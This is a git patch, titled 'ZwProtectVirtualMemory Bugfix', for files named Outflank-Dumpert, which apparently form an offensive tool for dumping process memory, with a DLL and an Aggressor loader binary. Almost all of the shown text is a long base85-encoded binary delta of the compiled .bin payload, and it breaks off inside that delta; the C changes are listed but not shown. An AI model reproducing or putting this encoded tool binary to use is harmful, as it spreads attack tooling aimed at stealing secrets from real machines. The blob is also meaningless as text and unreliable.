From 3add4d10af9b540a8f2cc7e817e3eec13e329fb4 Mon Sep 17 00:00:00 2001 From: Cn33liz Date: Fri, 5 Jul 2019 22:33:39 +0200 Subject: [PATCH] ZwProtectVirtualMemory Bugfix --- Dumpert-Aggressor/Outflank-Dumpert.bin | Bin 116241 -> 116241 bytes Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c | 5 +++-- Dumpert/Outflank-Dumpert/Dumpert.c | 5 +++-- 3 files changed, 6 insertions(+), 4 deletions(-) diff --git a/Dumpert-Aggressor/Outflank-Dumpert.bin b/Dumpert-Aggressor/Outflank-Dumpert.bin index 6101aa6adfaa425de0afcba31529c890b7d33d0a..ffc1be3cae3eec6dbd638f6d7f799b1cf903be8b 100644 GIT binary patch delta 17848 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 delta 17669 zcmeHudt8m#_y4nxj#3?`=uj%%Ns1^$GNEQ3WQ3T)j0{8W4TbSROrqmB#Kv(KhGE8x z%Q55rRniE#$Q5Xz4qFBuf6td?fo1} z7TPXZXuHePwod0&w%ps+lg0BcwnII0a+we>2tv7nLKPFr83gBkpUJIdH4{+WGT`xjAykd>G2tNpoqM0SjSyl7P4uonbTuhtx70#a9zs@RCS zM5AugOo$ApEysAdy?e&8dXnC`1Crhnq$)>3X`-SuU#{8fy_yfoCDzF$_ECv&l!#SI z43J7_v+km`_ezz?rAEo6u2agWahn-}X7%dNA+_rEzJ<`xKU6dnS#>8Up^xzo6;H(Y zN5gz59O642e8XI!jLwd+>J~`_68uBsj4}RkVWlW2>WBDy#~6F5t-A94l3q8fZY1|` z^a(pIrM1fn3J2HijUQJv-^CZCV)loJsSV!uYQ)g zTMD=4O((CW`Nvyz>90`-++x%fKxoyC=WjGIO+q2r~jP36>INL8Gc&FB1uQ;T60 zW=U;4HKA8ulv5j#s+cXS#ZQF-mRm{(X^jSB${3M-qI(1u3YGa*E|V$OutZMnL#nbX zjB(?0oc)tV$kLUv&c|}9m{LYf`4lvuSGOUd{;+>)U0N!JYUD}d-VyCvb(vDST5?A) z94;DrxuW)P{?^%56DFG|>br+pMsdFe$-eXUpt6o>{>j?8yW!p^S|{~sYQ|^`LQ=a= zUC6gI2=Siyf@V-wC=5AhL&IP+dIKyUps(=rZ2qLdGS|tdLCl=tpJJuKMU7_k+p0Uv z*EjTUyi>9(4w<@e(jyJ4t_8o|a4Oqv?(4FXF*nW{{orzABPvd_KY*1YSU$&oa6)~Y zA8XVptniuSh4lc7Te#%o7M4`CAk586^F|kE%J~y0e@+;c`-Hb{{4ra|XEhFsO2kwT zE6vKwunEhnjJFo))gMA)nTc_ZUQms_G$J#~j15^;+jJz>xn%*W*L$wze>NV>@_0|z z`|LVzqWxNNA)_`Ju)6G9)-zqe6iacgO6Bxbq ztI4~>XXe=<-HOr%^?U-ox_Tw0Xr=1auTk`b`T`_W?Fn@;I8+4L6@}X`P3y6Fs8Dm3 zN}jM`w8s9H`x`VX7E{e}Hr};TCK@#QS|Lh~=UbY@W}HKL%On)0<^$3E&uE?u4O9&M zkkSVA1_Hg>3F;@*&rP+)Re_U@d#P}>&5?0WATwa!5%n$%$wQCf+K=B_t?*S~K{4$+ ze6+iRo8}QUe+V-Lg%WVO8P3IqUqfg$mqgwOTUcn*#7m(Yp8%~K~x)X4E=Isx}i>JiQm)3N9+HE$p$Nr%e4HseM zxBRJB-%gkHC=pqZJ`p>it5rAaA-OHqRn*5iS#>E$8S=z7#3#tSvA4IJ?#yR-cj`Wj zio?yK_~JYUdJrXH*QW(&Kuwd(8t}G45Q>YDeuiZgyKX zBb^y=nS1zzvTt~AA9oKoloJi>EYkQczeXFb;j}cuwiSG?&j;)*Kkn0?o#L*(-c3eB zO~fG>ZPg6~i=)E+d8vDzk2;t4^KD_bbqq`~w%fonePis#$cf?noNqfeldJu_ogC+5 zEz`hmiZSG$P}lHwer?!dKFTk;!IF8{D7$7B*#uO5VAaOx)lvL_Uq`Px%b5_HRhsTL z=eD4&($1+7w8_FG2U3L2Z`|2G%ysuNCUn&vyzMf1!U=U*mfQpuBp>46CS)7ZnMHOd z)Fv?4DTU{;7H_?J2~uedGmE@WsAqx2jw0yQGx$M&KLm9*{qy~NHed#(HHAN2!C3}h zlBQn$gETKi!x^iNZQ#cOIKM_{CV@u{r_x*;RiKtEeH>Qe}Qbk zyMXS2_W)J{LxJ9)D)0i(2~-X~0@%Y)5@*!3FR@y?8|KcL!G8~Y%slwb7EObD&qj}G ztZ88){8Hc21tVtAL_mmRIP8MuYZ}3<(li$g{{|-Qv<9N#yyXELg|XFQPvZH|YR>Nl1v+n zTd+rShM#E}rPH3ZTH_24tNLhnAAY>+C|0mR{fc`9kL!5$Cb?X)P8}O&t@O9*hC`HD z{YiR5Ow_OoJq+it-OE~)ze1&};TD`XkRJ~Y>P)Ig_@BYLhQmG;GYf5cMES3h@ z)eeZ9dl+t!%X;=OT$T=ykA6iNgSv_bg?Q`E6 z{M~Z?9-i9D*XG+YLEtwRc{I5J`!kVas6pB3q)z8B)JO8-R)MPCWxQ3PE3e;L=hBL_ zpsx0$iX?q^-l27<&9PF{HD^tu=GY{cPsf@H%QGB15RGaw%Rh)U6tzT|%Mb1e3+O_m+@-~SL$e^o-`lYH3 z$5468B5eB?i^Q;F*tqWV;Lu3+lBb0B^Sz0pf;MXpZ0L&N#$UsU`RW6ZVwgnH5Y>g3 zg}P>}lUgWBYa)i#V8gw54hN7`Hx*_`V~^1FDh%ES(<>djM&3%-AeE1lB_%)*a!^%6 zIBgeMZPe%imJx2!82liM)|03&MB1O#ov7{SU9~YMvem7?SJt&m<&)bayRW}S-Yha) zwCYZS#SZTXdnwdN}+1q;U~t< zn&UeDUWeT_cZ{;F!`hjlafMONvRsCeAN@ut=P9JS&)p7HqxUW^d5o58d?w8_9!$rCvJUT>9XqT6Un9VBc zJx_4n$6)J@q+adJ1LFJEKROv%Cq?~C#8kSU`P}#j_KY8iZ)bOvjsm@UzxieSXy!R` zH1=M#BeXGb8Y4Z4aN27;Hs@6D+mxwh3ky&hIB|Wkzls(3eH>TLS{IDcKG5VOZP) zJ=p~=4*ZC9<2eJ98P5EH69e25BwLrJFku&?fJQRTs7V?DI}&7@zTjD(v|wZT&QAts z*nUC>jI~Oe&oZl7x);p+YapsHdKOYmk*BdU-i4dtu`-eyG+RcYrt>5+Xf}eUOP*&A z3E^Q9mcjK9Wszu`EGm&j#{ib)5ba`6IE+-ocMH#`yPS{WM$JvWHZjz0ot)UpFD15R z|KYYt-fo?sZ`BRKio@pK*s|G$TEo@t7>`cs=}3bVXDA4}VAZ|mE0R_*PaZmGp7wkA zA7bgYX4RcB7Y=G^i(A3tVNF%4A>8@%W}Pl1QFk4S5QLnAxl#;B(UQS4Z?LlQ?}W z?C?N)KPXl1hjx>tBYL|eU~~>p1cB`}n%06*w~7xNp{ws8S%&poiFN!VFB{<MufEnouD+C+boC zQt_$0^ou6$3sEG-P>9G?E+sQM&n?pNq2mD~{Tt*SfDdSV)QiBu4U75Ukxf*NTlv(H zvuwWk2CB0sxO10Ly2jVAA`vJ<=PbAbuCn(I^5{`Iyj=_&)!J@ZH<~24BJfj+G ziSC1Gc34Uj(+|PPSGf-*?c|bI!K1Qk0L%9;-}w@oN0IzaG7GKaxdtI>sP$@Q_4IU& zQJlYv&DX3$)s>q46n)ND=OEEGj{<7k_-MP8=PZv-vG+eWfEMXL551?G(CpubUL2p0 z62_+SO(}y|7Jrk{n5A>w=uViZ@uMReC2gd`z))?~X~B^xBCV+Pqr0)&{PyS=HiS1D z)7C!!16;pOi(#J0{PQu>1D0Zb%XjbXJZF2Kl3MJ zw=wo)>G&Y_h_@U+Sa+^7`euVGp}#)D(h07@=ChBl86U>x^K;|9*l_cs@xF|u@CFk< zV%~hvM3F5vZ=UF(VnOD-FT^xtP z-aH}^B62%k8BfTbr)l2}QcLVTt5v#n;sT!L??iV8r6yT?>X8?v;WjJYE}I$=KL8m>#$P(!R&qmt8=9-;2A*F54Z(q+?3e| zaN$wV35d=~qS$jtB0NzS%SoJP>JpjNg1sWMUSLbj4`w^pVI{mK(?4TJBzF0au2`*f zn5wr@>h>l0x1;B3@ae6ky;vWWg#?zV#j{p(25Ih-HB(7bjf1H&J=1_EpQYGOIO5G*Ijp1+ise01by4k#|;m z_HgOED7)e)RM{u0kjKso(0+tQv9DmGID=j;;a|;5#Y%WMuYcolbE$t-qEWg9ScU6`RYx&%L(;^cj8YW#%b9&^VREgT>4`C15c<=@}wncxMrSRlFTZ3>!nTD zN^{SpcU0^M4_V$8vom>l>rOozGa-8Jb5R?sp6Ui0^y&ymDmvp}RidTYQ8Qb?lJtgq z*Z~}PR!eIwW1~K!%J7RZt-41z>;8ozI9!5VR=mBH*+9 z%c3#fABcIm91|a*FILMoeqc=`;?rkq!dW5@TH9Y`lgcyJwqW^u`&vKt6F;-IjmBL= zhXp+|g?SF;4(q}+rH+3~I`CfW`Zl^u3tX?cBEwY~uJJwVrm!}=#rm-xe_$2C5k}84 zVw}L-CB_!aF}`cPKa1s;*ROS|`U;ljm)rEH6ANE!D)^iYzBCy(^lNMwhp_DeE)Irs zT@kZ5lUPprcX@t;dHIdWym+Z6~j4gXdzDKNQqvzoI(oOs#-t2EpYxQ> zlNs)dn@6$^y!$uD*(9^wmc@)cG_TzHIb#p_t8YiJ8$5a21Gbur+rPxxKe#=ZJ>?I! zx5XQBlkdJp=huCg$U5`q-vzU)-0%Cz?5^4L{be=#fsfz4g=Lx>?rB<=;ZCuCq-suA zo_wUaIe-60b(k}+clb}{%c~EMWQWW{kF>7C4Ccjo?sZhQ-|-y8i>B2GJ$ILi0SIrD4kAI+RoB+PsCN;#e*3 zy<=mkfW}1@)>wLRX@%IlG@mQ z-iLLyJ%>v5^2VL(zAQ1xl0ZnxWJ#7R!AjIzkR_94NdzQCvSgSniH79AWJw=cB0{oP zmPE;t6iAL`$fB0AC>5gpvcyf6OoQY{Sz;?m46|uTM`||8!Y7N#ZiBQDL~54F!e3<} zmNjY4mxVl}9C+qbnu}D7HBo*srhcYK*NscUWg5-!SnI%gSA$clG z#>tXoNGi;`PcCH$L1Iq#!}mAS=_1yICl|Y6+niq9lrcSDb!Lj=%V&ZRSv4aPw~|NP z{j9hBSqL)oqV@QW6MMEjTf}qEx;oD6Oh=?NP-95IhVcVueKoD1J9&&~cok=C=gTc; z`(i$IIyYQ1?k~uL#Nj140F%w%oeN}aC%<@p0Xxh;D>=&s@Q@2#u(OTB->dxl3kmG& zr5Am@hIXX6a|KJQtMy7&-mE)f%Qs@=+bNBD(3^Z$-u2=b^k&CJUuHI+yJ%$Wi22jY z)0yLfKTr-E7LM`{_}wd?*7JdYZi=_fJ+4k=tcK@bi(-ek^;#3gd6VmSHA9#-QX6O) zsZ9vs65l$+!24YH%h-q16YY?I4-ndo)V6MS0;rvP4F?8v1Kd{7<)TRRQ*VG?oS$YJ zphwB=9(D3ZirNW9C=u`zmG~MjT-c{9!6UVmx;j!_m6}&n#;6&ATMU{w^`xsd$uS>h zlz{S)(Q<{LrB48!-BAFjaag|eMx((ErBtG(R5C58{E0T{2B_$XHqrBeBuhMnbQ#j8 zQ7WXrtfz61@lUi>fwr7%^0CZ*StnKPatxXQZv4v|p#gT1-Vn8uT-SM6gStOMolXIc zvLzw@{FfVkUC+xJAr`sj60~{;bOA*CLzKX0YHA?yH?(>m>2`5QqsD6^wWXftc~EJW zjJ}e_5M2)mogN}b_rp?XiP~9ceDdY+k=mCbr;+#DJ+iBy*pcUE*z+b-pQl?G*0 zB3=0M{?o#m(vY3R*R&4#7O0)u6){m^$)i6YDb&upi)jEIT`B3j8WJ!Z4I-yqB~Uwe zk({eJBh^sqd71F`$0IKeB zrN$G8=`e3Il23=6I-Wln^8|tcRPMN-wAyIOm==h!62Z~XFCXOsa;km%$cTQ$}|M&b*tx@JjVP)cFe}K%NqtB`VQFGHgqp3`FM$C+65dTxOX<5wo{M3dmjk$Yy7j}&gD(}Ej`O@;<__0oTxsS^37O!)A3fs@8-*#u? z_=?+oSzB(o?V}QIa)&!cwu-O1=yUC zH`8S__MFM%M8i{Dse0tUts7?y8OZnEt3a*me;cCG-r%o)3kte>T@ZR2Y%JX(W`uUs z&OJ&K5HIDD)X^du2UPbo#I*^u>YniU`_mDyoW38bs(+ooxj)_EpuhAuSI?@O&A)yy z5UpQ-u)^VnpCr{g1OFI|i;wqiV*q&Kx}%%sB+FM8$N_hHZa z>(J!nc+qeQPc=&}^N*i)4KUm&{vVgs{fCgYa}( z!1Mg*G;d4IE337#@h@uOAb(h$s?sjzLux!aRWyJ(diA6OWZ-d;?x*zftQkfEV^@`k zTgVi=;_Y^l6aovZ0d<`b^9DroJvC$5Yje|=+ZhYtMX!4GtNZpXzRfM1W2?eflR77@ zx8uP~1oZ_C1;H{Q7qknM2TBB0frL6tm<@CSUITgqqe1EBFJAX&Y>xTBn-MD3@TaEi zk($TXbIOSS28Hmivx3bOOi@tE#Gf0RWxZ1h9#(LNf;Ni&6D7S;!6w_~az85h#}q7+ zF+-?Q1ddx|#UKT{C^$&LGzAwZn5*DH1I3+H95U^-wTa!Ojw92m)U4rB04h zaIS(o6x^@iFA82#@TP*lEBIDH$8Y8Od=-pP@M8r>D40r!_JtXWV4;F56x^!dUIp_M zyrkeg1)nRZ+9o$#UqNpL+bS5R;7A3h0jYgqfg)I~;8q3qDwwC>c?It%_*_AIWsHLr zl-!9wi_$A(6&rMu%>J~rfZm|moui7$tb)KOtUFtnn4zfvnnMQ2&SA( ztku4{_1GxKjOb4leWiu$f2EVh%lY0DWW2QDpI9_XP6wyRIAf!XD;2CYyiBP#VTPQa 